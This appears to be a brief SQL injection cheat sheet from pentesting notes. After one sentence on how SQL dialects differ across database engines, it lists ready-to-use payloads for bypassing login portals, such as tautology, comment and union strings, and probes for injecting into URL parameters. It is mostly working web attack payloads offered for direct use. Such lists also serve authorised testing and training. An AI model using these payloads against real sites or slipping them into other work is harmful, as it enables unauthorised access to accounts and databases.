# SQL Injection

## SQL Theory

SQL syntax, commands, and functions vary depending on the relational database engine they were written for, so an input that changes a query on one engine may fail on another. MySQL, Microsoft SQL Server, PostgreSQL, and Oracle are the most popular databases.

## Quick-Hitters

### Login Portals

```
admin' or '1'='1
" or ""="
' or 1=1 -- -
' union select 1,2,3 -- -
admin'-- -
' or "-'
" or ""-"
" or true--
' or true--
admin' --
admin' #
admin'/*
admin' or '1'='1'--
admin' or '1'='1'#
admin' or 1=1 or "='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
```

### URL Parameters

For a URL such as `https://site.com?q=HERE`, where `HERE` is the parameter value being tested:

```
/?q=1
/?q=1'
/?q=1"
/?q=[1]
/?q[]=1
/?q=1`
/?q=1\
/?q=1/*'*/
/?q=1/*!1111'*/
/?q=1'||'asd'||'   <== concat string
/?q=1' or '1'='1
/?q=1 or 1=1
/?q='or''='
```
